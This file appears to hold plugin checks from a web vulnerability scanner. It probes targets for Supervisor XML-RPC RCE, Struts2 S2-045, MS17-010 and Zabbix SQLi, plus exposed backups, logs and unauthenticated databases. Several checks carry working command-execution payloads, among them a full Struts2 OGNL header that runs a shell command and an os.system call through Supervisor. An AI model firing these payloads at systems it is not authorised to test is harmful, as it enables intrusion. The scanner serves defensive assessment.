def do_check(self, url):
    # Check for CVE-2017-11610: Supervisor XML-RPC remote command execution.
    # Verifies exploitability by running a harmless `expr` command through the
    # exposed nested-attribute call chain and reading the result back out of
    # supervisord's own log file.
    if url != '/':
        return
    arg = self.host
    # supervisord's HTTP/XML-RPC interface listens on port 9001 by default
    if ':9001' not in arg:
        domain = arg + ':9001'
    else:
        domain = arg
    target = 'http://' + domain + '/RPC2'
    try:
        proxy = xmlrpclib.ServerProxy(target)
        # Snapshot the current log so only freshly appended output is compared
        old = getattr(proxy, 'supervisor.readLog')(0, 0)
        a = random.randint(10000000, 20000000)
        b = random.randint(10000000, 20000000)
        # Random operands make the expected output unguessable / collision-free
        command = 'expr ' + str(a) + ' + ' + str(b)
        logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()
        # Vulnerable dispatchers resolve dotted method names to arbitrary
        # attributes, reaching os.system; stdout is tee'd into the log file
        getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')(
            '{} | tee -a {}'.format(command, logfile))
        result = getattr(proxy, 'supervisor.readLog')(0, 0)
        # Vulnerable iff the newly appended log tail equals a + b
        if result[len(old):].strip() == str(a + b):
            save_user_script_result(
                self, '', arg, '',
                'CVE-2017-11610 Supervisor Remote Command Execution')
    except Exception as e:
        # Best-effort probe: any network/XML-RPC failure means "not confirmed"
        pass
def do_check(self, url):
    # Discuz! forum checks: leftover config backup files + getcolor.htm DOM XSS.
    if url == '/' and self.conn_pool and self.lang == 'php':
        # Fingerprint Discuz via the forum.php redirect or the *_saltkey cookie
        if self.index_status == 301 and self.index_headers.get('location', '').find('forum.php') >= 0 or \
                str(self.index_headers).find('_saltkey=') > 0:
            # Common backup / editor-swap copies of the Discuz config files
            url_lst = [
                '/config/config_ucenter.php.bak',
                '/config/.config_ucenter.php.swp',
                '/config/.config_global.php.swp',
                '/config/config_global.php.1',
                '/uc_server/data/config.inc.php.bak',
                '/config/config_global.php.bak',
                '/include/config.inc.php.tmp'
            ]
            for _url in url_lst:
                status, headers, html_doc = self._http_request(_url)
                if status == 200 or status == 206:
                    # Raw PHP source in the body means the file is served, not executed
                    if html_doc.find('<?php') >= 0:
                        save_user_script_result(self, status, self.base_url + _url,
                                                'Discuz Backup File Found')
            # getcolor DOM XSS
            status, headers, html_doc = self._http_request(
                '/static/image/admincp/getcolor.htm')
            # Vulnerable versions eval() an attacker-controlled callback name
            if html_doc.find("if(fun) eval('parent.'+fun+'") > 0:
                save_user_script_result(
                    self, status,
                    self.base_url + '/static/image/admincp/getcolor.htm',
                    'Discuz getcolor DOM XSS')
def do_check(self, url):
    # Look for compressed archives / dumps named after the host or domain
    # (at the site root) or after the enclosing folder (inside sub folders).
    if not self.conn_pool:
        return
    extensions = [
        '.zip', '.rar', '.tar.gz', '.tar.bz2', '.tgz', '.7z', '.log', '.sql'
    ]
    if url == '/' and self.domain_sub:
        # e.g. www.example.com -> try /www.example.com.zip, /example.zip, ...
        file_names = [self.host.split(':')[0], self.domain_sub]
        for name in file_names:
            for ext in extensions:
                status, headers, html_doc = self.http_request('/' + name + ext)
                # 206 => the server honoured a Range request for a real file.
                # NOTE(review): due to and/or precedence the final `.sql`
                # clause is ORed in independently of status == 206 — confirm
                # whether that is intentional.
                if status == 206 and \
                        (self.has_status_404 or headers.get('content-type', '').find('application/') >= 0) or \
                        (ext == '.sql' and html_doc.find("CREATE TABLE") >= 0):
                    save_user_script_result(self, status,
                                            self.base_url + '/' + name + ext,
                                            '', 'Compressed File')
    elif url != '/':
        # sub folders like /aaa/bbb/  ->  probe /aaa/bbb.zip etc.
        folder_name = url.split('/')[-2]
        if len(folder_name) >= 4:
            # very short names are skipped as noise-prone
            url_prefix = url[:-len(folder_name) - 1]
            for ext in extensions:
                status, headers, html_doc = self.http_request(url_prefix + folder_name + ext)
                if status == 206 and headers.get('content-type', '').find('application/') >= 0:
                    save_user_script_result(
                        self, status,
                        self.base_url + url_prefix + folder_name + ext,
                        '', 'Compressed File')
def do_check(self, url):
    """Probe the host for the ElasticSearch Groovy sandbox escape
    (CVE-2015-1427) and record a finding when the external `execute`
    helper confirms command execution.

    Runs only once per target, on the '/' crawl entry.
    """
    if url == '/':
        host_ip = self.host.split(':')[0]
        # `execute` performs the actual probe; truthy return == vulnerable
        if execute(host_ip, 'ifconfig'):
            save_user_script_result(
                self, '',
                'http://%s:9200/_search?pretty' % host_ip,
                'ElasticSearch Groovy remote code exec CVE-2015-1427')
def do_check(self, url):
    # Detect open HTTP proxies: ask every open port on the target to proxy a
    # request to weibo.com and verify the genuine robots.txt comes back.
    if url != '/':
        return
    ip = self.host.split(':')[0]
    ports_open = is_port_open(ip)
    headers = {
        "User-Agent": "BugScan plugins http_proxy v0.1",
        "Connection": "close"
    }
    for port in ports_open:
        proxy_url = "http://{}:{}".format(ip, port)
        proxy = {"http": proxy_url, "https": proxy_url}
        try:
            _ = requests.get('http://weibo.com/robots.txt',
                             headers=headers,
                             proxies=proxy,
                             timeout=10.0)
            code = _.status_code
            html = _.text
            # The sitemap line fingerprints the real robots.txt, filtering out
            # servers that answer every request with their own content
            if code == 200 and html.find("http://weibo.com/sitemap.xml") >= 0:
                save_user_script_result(self, '', '%s:%s' % (ip, port),
                                        'HTTP Proxy Found')
        except Exception as e:
            # Port is not a working proxy (refused / timeout) — move on
            pass
def do_check(self, url):
    """Check whether the target exposes a vulnerable FastCGI service
    (port 9000) via the external `test_fastcgi` helper."""
    if url != '/':
        return
    target_host = self.host.split(':')[0]
    is_vul, txt = test_fastcgi(target_host)
    if not is_vul:
        return
    save_user_script_result(self, '', target_host + ':9000',
                            'Fastcgi Remote Code Execution Vulnerability')
def do_check(self, url):
    # Look for leftover archive / log files served as application/octet-stream,
    # named after the host/domain (at root) or after the enclosing folder.
    if not self.conn_pool:
        return
    extensions = ['.zip', '.rar', '.tar.gz', '.tar.bz2', '.tgz', '.7z', '.log']
    if url == '/' and self.domain_sub:
        file_names = [self.host.split(':')[0], self.domain_sub]
        for name in file_names:
            for ext in extensions:
                status, headers, html_doc = self._http_request('/' + name + ext)
                # 206 => server honoured the Range request for a real file
                if status == 206 and headers.get(
                        'content-type', '').find('application/octet-stream') >= 0:
                    save_user_script_result(self, status,
                                            self.base_url + '/' + name + ext,
                                            'Possible Data File Found')
    elif url != '/':
        # sub folders like /aaa/bbb/  ->  probe /aaa/bbb.zip etc.
        folder_name = url.split('/')[-2]
        # NOTE(review): unlike the sibling compressed-file script there is no
        # minimum-length guard on folder_name here — confirm if intended.
        url_prefix = url[:-len(folder_name) - 1]
        for ext in extensions:
            status, headers, html_doc = self._http_request(url_prefix + folder_name + ext)
            if status == 206 and headers.get(
                    'content-type', '').find('application/octet-stream') >= 0:
                save_user_script_result(
                    self, status,
                    self.base_url + url_prefix + folder_name + ext,
                    'Possible Data File Found')
def do_check(self, url):
    """Flag the site as an admin/backend portal when the index page
    redirects to a URL containing a typical management keyword."""
    if url != '/' or not self.conn_pool:
        return
    if self.index_status not in (301, 302):
        return
    location = self.index_headers.get('location', '')
    for kw in ('admin', 'login', 'manage', 'backend'):
        if location.find(kw) >= 0:
            save_user_script_result(self, self.index_status,
                                    self.base_url + '/', 'Admin Site')
            break
def do_check(self, url):
    # MS17-010 (EternalBlue) detection over SMBv1, TCP port 445.
    # Replays a canned negotiate / session-setup handshake, connects to the
    # IPC$ tree, then issues a named-pipe transaction; a
    # STATUS_INSUFF_SERVER_RESOURCES reply (0xC0000205, little-endian
    # "\x05\x02\x00\xc0") is the public fingerprint of an unpatched host.
    if url != '/':
        return
    ip = self.host.split(':')[0]
    port = 445
    timeout = 5
    # SMB_COM_NEGOTIATE with the classic dialect list up to "NT LM 0.12"
    negotiate_protocol_request = binascii.unhexlify(
        "00000054ff534d4272000000001801280000000000000000000000000000729c0000c4e1003100024c414e4d414e312e3000024c4d312"
        "e325830303200024e54204c414e4d414e20312e3000024e54204c4d20302e313200")
    # SMB_COM_SESSION_SETUP_ANDX carrying an NTLMSSP NEGOTIATE blob
    session_setup_request = binascii.unhexlify(
        "0000008fff534d4273000000001801280000000000000000000000000000729c0000c4e10cff000000dfff02000100000000003100000"
        "00000d400008054004e544c4d5353500001000000050208a2010001002000000010001000210000002e3431426c7441314e5059746249"
        "55473057696e646f7773203230303020323139350057696e646f7773203230303020352e3000")
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        s.connect((ip, port))
        s.send(negotiate_protocol_request)
        s.recv(1024)
        s.send(session_setup_request)
        data = s.recv(1024)
        # Server-assigned UID sits at offset 32-33 of the SMB header
        user_id = data[32:34]
        # Follow-up NTLMSSP AUTH message, patched with the server's UID
        session_setup_request_2 = binascii.unhexlify(
            "00000150ff534d4273000000001801280000000000000000000000000000729c" + binascii.hexlify(
                user_id) + "c4e10cff000000dfff0200010000000000f200000000005cd0008015014e544c4d535350000300000018001800"
                           "40000000780078005800000002000200d000000000000000d200000020002000d200000000000000f200000005"
                           "0208a2ec893eacfc70bba9afefe94ef78908d37597e0202fd6177c0dfa65ed233b731faf86b02110137dc50101"
                           "000000000000004724eed7b8d2017597e0202fd6177c0000000002000a0056004b002d005000430001000a0056"
                           "004b002d005000430004000a0056004b002d005000430003000a0056004b002d00500043000700080036494bf1"
                           "d7b8d20100000000000000002e003400310042006c007400410031004e00500059007400620049005500470030"
                           "0057696e646f7773203230303020323139350057696e646f7773203230303020352e3000")
        s.send(session_setup_request_2)
        s.recv(1024)
        session_setup_request_3 = binascii.unhexlify(
            "00000063ff534d4273000000001801200000000000000000000000000000729c0000c4e10dff000000dfff0200010000000000000"
            "0000000000000400000002600002e0057696e646f7773203230303020323139350057696e646f7773203230303020352e3000")
        s.send(session_setup_request_3)
        data = s.recv(1024)
        # TID for the connected tree, again at header offset 32-33
        tree_id = data[32:34]
        smb = get_tree_connect_request(ip, tree_id)
        s.send(smb)
        s.recv(1024)
        # Transaction request on "\PIPE\" (the 5c504950455c00 tail), stamped
        # with the captured UID and TID
        poc = binascii.unhexlify(
            "0000004aff534d422500000000180128000000000000000000000000" + binascii.hexlify(
                user_id) + "729c" + binascii.hexlify(
                tree_id) + "c4e11000000000ffffffff0000000000000000000000004a0000004a0002002300000007005c504950455c00")
        s.send(poc)
        data = s.recv(1024)
        s.close()
        # STATUS_INSUFF_SERVER_RESOURCES => MS17-010 not patched
        if "\x05\x02\x00\xc0" in data:
            save_user_script_result(self, '', ip + ':445', '',
                                    'MS17010 SMB Remote Code Execution')
    except Exception as e:
        # Any network/protocol failure: treat as not vulnerable
        return False
def do_check(self, url):
    """Check for the Zabbix jsrpc.php SQL injection (reported as
    CVE-2016-10134).

    Probes the two common jsrpc.php locations; when one answers, re-requests
    it with the injection `payload` appended and looks for the injected
    `mark` string in the response body. Both `payload` and `mark` are
    module-level constants defined elsewhere in this script.
    """
    if url == '/' and self.conn_pool and self.lang == 'php':
        url_lst = ['/zabbix/jsrpc.php', '/jsrpc.php']
        for _url in url_lst:
            status, headers, html_doc = self._http_request(_url)
            if status == 200 or status == 206:
                u = _url + payload
                # FIX: the original re-requested `_url`, so the crafted URL
                # `u` was never sent and the SQLi could never be detected.
                status, headers, html_doc = self._http_request(u)
                if mark in html_doc:
                    save_user_script_result(self, status, self.base_url + u,
                                            'Zabbix jsrpc SQLi Found')
                    break
def do_check(self, url):
    # Fingerprint Microsoft Exchange OutLook Web App via its characteristic
    # /owa redirect and the /ews/ (Exchange Web Services) endpoint.
    if url == '/' and self.conn_pool:
        # Case 1: index page redirects straight to https://host/owa
        if self.index_status == 302 and self.index_headers.get(
                'location', '').lower() == 'https://%s/owa' % self.host:
            save_user_script_result(self, 302, 'https://%s' % self.host,
                                    'OutLook Web APP Found')
            return
        status, headers, html_doc = self.http_request('/ews/')
        if status == 302:
            redirect_url = headers.get('location', '')
            # NOTE(review): this matches a malformed double-scheme Location
            # ('https://HOSThttp://HOST/ews/') that some IIS/Exchange setups
            # appear to emit — confirm against live behaviour.
            if redirect_url == 'https://%shttp://%s/ews/' % (self.host, self.host):
                save_user_script_result(self, 302, 'https://%s' % self.host,
                                        'OutLook Web APP Found')
                return
            if redirect_url == 'https://%s/ews/' % self.host:
                # Follow the redirect over HTTPS; EWS answers 401 to an
                # unauthenticated HEAD request
                try:
                    conn = httplib.HTTPSConnection(self.host)
                    conn.request('HEAD', '/ews')
                    if conn.getresponse().status == 401:
                        save_user_script_result(self, 401, redirect_url,
                                                'OutLook Web APP Found')
                    conn.close()
                except Exception as e:
                    pass
                return
        elif status == 401:
            # Direct IIS auth challenge on /ews/ is also a strong indicator
            if headers.get('Server', '').find('Microsoft-IIS') >= 0:
                save_user_script_result(self, 401, self.base_url + '/ews/',
                                        'OutLook Web APP Found')
                return
def do_check(self, url): if not self.conn_pool: return url = "" for a in self.index_a_urls: if a.endswith('.action') or a.endswith('.do'): url = a break if not url: return cmd = 'env' headers = {} headers['User-Agent'] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) " \ "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" headers['Content-Type'] = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS)." \ "(#_memberAccess?(#_memberAccess=#dm):" \ "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." \ "(#ognlUtil=#container.getInstance" \ "(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." \ "(#ognlUtil.getExcludedPackageNames().clear())." \ "(#ognlUtil.getExcludedClasses().clear())." \ "(#context.setMemberAccess(#dm))))." \ "(#cmd='" + \ cmd + \ "')." \ "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase()." \ "contains('win')))." \ "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \ "(#p=new java.lang.ProcessBuilder(#cmds))." \ "(#p.redirectErrorStream(true)).(#process=#p.start())." \ "(#ros=(@org.apache.struts2.ServletActionContext@getResponse()." \ "getOutputStream()))." \ "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." \ "(#ros.flush())}" data = '--40a1f31a0ec74efaa46d53e9f4311353\r\n' \ 'Content-Disposition: form-data; name="image1"\r\n' \ 'Content-Type: text/plain; charset=utf-8\r\n\r\ntest\r\n--40a1f31a0ec74efaa46d53e9f4311353--\r\n' try: html = self.conn_pool.urlopen(method='POST', url=self.base_url + '/' + url, body=data, headers=headers, retries=1).data if html.find('LOGNAME=') >= 0: save_user_script_result(self, '', self.base_url + '/' + url, 'Struts2 s02-45 Remote Code Execution') except Exception as e: pass
def do_check(self, url):
    """Look for WordPress configuration backup files left in the web root.

    Runs only on the index page of sites whose index HTML carries the
    '/wp-content/themes/' marker, and reports any backup variant of
    wp-config.php whose body contains raw PHP source (i.e. the file is
    served instead of executed).
    """
    if url == '/' and self.conn_pool:
        if self.index_html_doc.find('/wp-content/themes/') >= 0:
            url_lst = [
                '/wp-config.php.inc', '/wp-config.inc', '/wp-config.bak',
                '/wp-config.php~', '/.wp-config.php.swp', '/wp-config.php.bak'
            ]
            for _url in url_lst:
                status, headers, html_doc = self._http_request(_url)
                # FIX: removed a leftover debug `print _url` statement that
                # polluted scanner output (and tied the script to Python 2).
                if status == 200 or status == 206:
                    if html_doc.find('<?php') >= 0:
                        save_user_script_result(self, status,
                                                self.base_url + _url,
                                                'WordPress Backup File Found')
def do_check(self, url):
    """Report MongoDB instances (port 27017) that allow listing databases
    without authentication."""
    if url != '/':
        return
    try:
        mongo_host = self.host.split(':')[0]
        client = pymongo.MongoClient(host=mongo_host, port=27017)
        names = client.database_names()
        if not names:
            # reachable but nothing listable — close and move on
            client.close()
            return
        message = "%s MongoDB Unauthorized Access : %s" % (mongo_host, ",".join(names))
        client.close()
        save_user_script_result(self, '', 'mongodb://%s:27017' % mongo_host, message)
    except Exception as e:
        # connection refused / auth required — not a finding
        pass
def do_check(self, url):
    """Detect Zookeeper instances (port 2181) that answer the 'envi'
    four-letter admin command without authentication."""
    if url != '/':
        return
    ip = self.host.split(':')[0]
    s = None  # FIX: pre-bind so the finally block can never hit a NameError
    try:
        socket.setdefaulttimeout(5)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, 2181))
        s.send('envi')
        data = s.recv(1024)
        # An 'Environment' banner means the admin command was served openly
        if 'Environment' in data:
            save_user_script_result(self, '', 'zookeeper://%s:2181' % ip, '',
                                    'Zookeeper Unauthorized Access')
    except Exception as e:
        pass
    finally:
        # FIX: the original called s.close() unconditionally; if
        # socket.socket() itself raised, `s` was unbound and the finally
        # block raised an uncaught NameError.
        if s is not None:
            s.close()
def do_check(self, url):
    # Redis unauthorized-access check: send a raw RESP `info` command to
    # port 6379 and look for the redis_version field in the reply.
    if url != '/':
        return
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(3)
    try:
        host = self.host.split(':')[0]
        s.connect((host, 6379))
        # RESP encoding of: *1\r\n$4\r\ninfo\r\n
        payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
        s.send(payload)
        data = s.recv(1024)
        s.close()
        # An INFO reply without an auth error carries redis_version
        if "redis_version" in data:
            save_user_script_result(self, '', 'redis://' + host + ':6379',
                                    'Redis Unauthorized Access')
    except Exception as e:
        # Ensure the socket is released on any failure as well
        s.close()
def do_check(self, url):
    # Probe a wordlist of sensitive folder / file names at the site root.
    # Skipped when the 404 baseline itself redirects (301) — too noisy.
    if url != '/' or not self.conn_pool or self._404_status == 301:
        return
    # `folders` is a module-level whitespace-separated wordlist defined
    # elsewhere in this script
    _folders = folders.split()
    for _url in _folders:
        status, headers, html_doc = self._http_request(_url)
        if status in (301, 302):
            location = headers.get('location', '')
            # A redirect onto the same path + '/' means the folder exists
            if location.startswith(self.base_url + _url + '/') or location.startswith(_url + '/'):
                save_user_script_result(self, status, self.base_url + _url,
                                        'Possible Sensitive Folder Found')
        # 206 on a Range request indicates a real file, provided 206 is not
        # the server's blanket answer (checked against the 404 baseline)
        if status == 206 and self._404_status != 206:
            save_user_script_result(self, status, self.base_url + _url,
                                    'Possible Sensitive File Found')
def do_check(self, url):
    # Hunt for exposed log files: first locate existing log folders, then
    # request common log file names inside each candidate folder.
    # Skipped on sites using URL rewriting (responses would be unreliable).
    if url == '/' and self.conn_pool and not self.rewrite:
        folders = ['']  # '' => probe the site root itself
        for log_folder in [
                'log', 'logs', '_log', '_logs', 'access-log', 'errorlog'
        ]:
            status, headers, html_doc = self._http_request('/' + log_folder)
            if status in (301, 302):
                location = headers.get('location', '')
                # Redirect to the same name + '/' confirms the folder exists
                if location.startswith(self.base_url + '/' + log_folder + '/') or \
                        location.startswith('/' + log_folder + '/'):
                    folders.append(log_folder)
            if status == 206 and self._404_status != 206:
                save_user_script_result(self, status,
                                        self.base_url + '/' + log_folder,
                                        'Log File Found')
        url_lst = [
            'access.log', 'www.log', 'error.log', 'log.log', 'sql.log',
            'errors.log', 'debug.log', 'db.log', 'install.log', 'server.log',
            'sqlnet.log', 'WS_FTP.log', 'database.log', 'data.log', 'app.log',
            '/log.tar.gz', '/log.rar', '/log.zip', '/log.tgz',
            '/log.tar.bz2', '/log.7z'
        ]
        # Binary-ish log names: require Range support + octet-stream type
        for log_folder in folders:
            for _url in url_lst:
                status, headers, html_doc = self._http_request('/' + log_folder + '/' + _url)
                # print '/' + log_folder + '/' + _url
                if headers.get('content-type', '').find('image') >= 0:
                    # images are obvious false positives — skip
                    continue
                if status == 206 and headers.get(
                        'content-type', '').find('application/octet-stream') >= 0:
                    save_user_script_result(
                        self, status,
                        self.base_url + '/' + log_folder + '/' + _url,
                        'Log File Found')
        # Plain-text variants must come back as text/plain
        for log_folder in folders:
            for _url in ['log.txt', 'logs.txt']:
                status, headers, html_doc = self._http_request('/' + log_folder + '/' + _url)
                # print '/' + log_folder + '/' + _url
                if status == 206 and headers.get('content-type', '').find('text/plain') >= 0:
                    save_user_script_result(
                        self, status,
                        self.base_url + '/' + log_folder + '/' + _url,
                        'Log File Found')
def do_check(self, url):
    # Newer variant of the log-file hunt: discovers log folders (feeding them
    # back to the scan queue and crawler), then checks common log names under
    # each discovered folder and the site root.
    if url == '/' and self.conn_pool:
        folders = ['']  # '' => probe the site root itself
        for log_folder in [
                'log', 'logs', '_log', '_logs', 'accesslog', 'errorlog'
        ]:
            status, headers, html_doc = self.http_request('/' + log_folder)
            if status in (301, 302):
                location = headers.get('location', '')
                # Redirect to the same name + '/' confirms the folder exists
                if location.startswith(self.base_url + '/' + log_folder + '/') or \
                        location.startswith('/' + log_folder + '/'):
                    folders.append(log_folder)
                    # Hand the discovered folder back to the scanner/crawler
                    self.enqueue(log_folder)
                    self.crawl('/' + log_folder + '/')
            if status == 206 and self._404_status != 206:
                save_user_script_result(self, status,
                                        self.base_url + '/' + log_folder, '',
                                        'Log File Found')
        url_lst = [
            'access.log', 'www.log', 'error.log', 'log.log', 'sql.log',
            'errors.log', 'debug.log', 'db.log', 'install.log', 'server.log',
            'sqlnet.log', 'WS_FTP.log', 'database.log', 'data.log', 'app.log',
            'log.tar.gz', 'log.rar', 'log.zip', 'log.tgz', 'log.tar.bz2',
            'log.7z'
        ]
        for log_folder in folders:
            for _url in url_lst:
                # avoid a double slash when probing the site root ('')
                url_prefix = '/' + log_folder if log_folder else ''
                status, headers, html_doc = self.http_request(url_prefix + '/' + _url)
                # print '/' + log_folder + '/' + _url
                if status == 206 and \
                        (self.has_status_404 or headers.get('content-type', '').find('application/') >= 0):
                    save_user_script_result(
                        self, status,
                        self.base_url + url_prefix + '/' + _url,
                        '', 'Log File')
        # Plain-text variants must come back as text/plain
        for log_folder in folders:
            for _url in ['log.txt', 'logs.txt']:
                url_prefix = '/' + log_folder if log_folder else ''
                status, headers, html_doc = self.http_request(url_prefix + '/' + _url)
                # print '/' + log_folder + '/' + _url
                if status == 206 and headers.get('content-type', '').find('text/plain') >= 0:
                    save_user_script_result(
                        self, status,
                        self.base_url + url_prefix + '/' + _url,
                        '', 'Log File')